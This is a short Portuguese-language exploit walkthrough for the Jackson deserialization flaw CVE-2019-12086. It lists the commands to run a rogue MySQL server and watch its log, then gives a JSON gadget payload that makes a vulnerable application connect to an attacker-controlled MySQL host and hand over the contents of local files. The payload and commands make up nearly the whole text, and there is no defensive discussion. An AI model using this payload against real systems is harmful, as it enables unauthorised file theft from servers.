
jackson unserialize
CVE-2019-12086 desserialização do Jackson
1、Iniciar o servidor MySQL malicioso:
python rogue_mysql_server.py
2、Ver o mysql.log no mesmo diretório:
tail -f mysql.log
3、Enviar o seguinte json para a aplicação vulnerável:
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
Quando o Jackson desserializa a string json maliciosa, ele se conecta ao servidor MySQL malicioso, e o conteúdo do arquivo lido é escrito no mysql.log do servidor malicioso.